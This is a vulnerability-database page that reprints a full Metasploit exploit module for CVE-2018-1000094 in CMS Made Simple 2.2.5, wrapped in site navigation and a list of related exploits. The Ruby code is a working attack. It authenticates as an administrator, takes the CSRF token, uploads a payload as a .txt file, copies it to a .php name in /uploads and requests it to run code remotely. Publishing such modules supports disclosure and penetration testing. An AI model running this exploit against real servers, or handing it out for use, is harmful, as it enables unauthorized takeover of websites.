Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CMS Made Simple 2.2.5 Authenticated Remote Command Execution Exploit

🗓️ 20 Jul 2018 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 611 Views

CMS Made Simple v2.2.5 Authenticated RCE via File Upload/Copy allows an authenticated administrator to upload a file and rename it to have a .php extension. The file can then be executed by opening the URL of the file in the /uploads/ directory. Vulnerability discovered by Mustafa Hasen and Jacob Robles

Related
Code
ReporterTitlePublishedViews
Family
0day.today		glibc - getcwd() Local Privilege Escalation Exploit
18 Jan 201800:00
zdt
0day.today		Exodus Wallet (ElectronJS Framework) - Remote Code Execution Exploit
26 Jan 201800:00
zdt
0day.today		InfoZip UnZip 6.00 / 6.1c22 Buffer Overflow Vulnerability
8 Feb 201800:00
zdt
0day.today		Exodus Wallet (ElectronJS Framework) - Remote Code Execution Exploit
29 Mar 201800:00
zdt
0day.today		Nanopool Claymore Dual Miner 7.3 - Remote Code Execution Vulnerability
17 May 201800:00
zdt
0day.today		glibc - realpath() Privilege Escalation Exploit
13 Jun 201800:00
zdt
0day.today		CMSMadeSimple 2.2.5 - Remote Code Execution Exploit
4 Jul 201800:00
zdt
0day.today		Nanopool Claymore Dual Miner APIs Remote Code Execution Exploit
17 Jul 201800:00
zdt
Circl		CVE-2018-1000094
4 Jul 201800:00
circl
CNVD		CMS Made Simple Remote Code Execution Vulnerability (CNVD-2018-06398)
13 Mar 201800:00
cnvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'CMS Made Simple Authenticated RCE via File Upload/Copy',
      'Description'     => %q{
        CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file
        and rename it to have a .php extension. The file can then be executed by opening
        the URL of the file in the /uploads/ directory.
      },
      'Author' =>
        [
          'Mustafa Hasen',  # Vulnerability discovery and EDB PoC
          'Jacob Robles'    # Metasploit Module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ 'CVE', '2018-1000094' ],
          [ 'CWE', '434' ],
          [ 'EDB', '44976' ],
          [ 'URL', 'http://dev.cmsmadesimple.org/bug/view/11741' ]
        ],
      'Privileged'  => false,
      'Platform'  => [ 'php' ],
      'Arch'  => ARCH_PHP,
      'Targets' =>
        [
          [ 'Universal', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 03 2018'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base cmsms directory path", '/cmsms/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
        OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
      ])

    register_advanced_options ([
      OptBool.new('ForceExploit',  [false, 'Override check result', false])
    ])
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
      return CheckCode::Unknown
    end

    version = Gem::Version.new($1)
    vprint_status("#{peer} - CMS Made Simple Version: #{version}")

    if version == Gem::Version.new('2.2.5')
      return CheckCode::Appears
    end

    if version < Gem::Version.new('2.2.5')
      return CheckCode::Detected
    end

    CheckCode::Safe
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Appears].include?(check)
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
      'method' => 'POST',
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'loginsubmit' => 'Submit'
      }
    })
    unless res
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
    end

    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
    end

    vprint_good("#{peer} - Authentication successful")
    csrf_name = $1
    csrf_val = $2

    csrf = {csrf_name => csrf_val}
    cookies = res.get_cookies
    filename = rand_text_alpha(8..12)

    # Generate form data
    message = Rex::MIME::Message.new
    message.add_part(csrf[csrf_name], nil, nil, "form-data; name=\"#{csrf_name}\"")
    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
    data = message.to_s

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
      'method' => 'POST',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{message.bound}",
      'cookie' => cookies
    })

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
    end
    vprint_good("#{peer} - File uploaded #{filename}.txt")

    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
    data = {
      'mact' => 'FileManager,m1_,fileaction,0',
      "m1_fileactioncopy" => "",
      'm1_selall' => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
      'm1_destdir' => '/',
      'm1_destname' => "#{filename}.php",
      'm1_path' => '/uploads',
      'm1_submit' => 'Copy',
      csrf_name => csrf_val
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
      'method' => 'POST',
      'cookie' => cookies,
      'vars_post' => data
    })

    unless res
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
    end

    unless res.code == 302 && res.headers['Location'].to_s.include?('copysuccess')
      fail_with(Failure::UnexpectedReply, 'Failed to rename the file')
    end
    vprint_good("#{peer} - File renamed #{filename}.php")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),
      'method' => 'GET',
      'cookie' => cookies
    })
  end
end

#  0day.today [2018-07-21]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jul 2018 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.54916
cms made simpleauthenticatedremote command executionfile uploadvulnerabilitymustafa hasenjacob roblescve-2018-1000094cwe-434edb-44976
611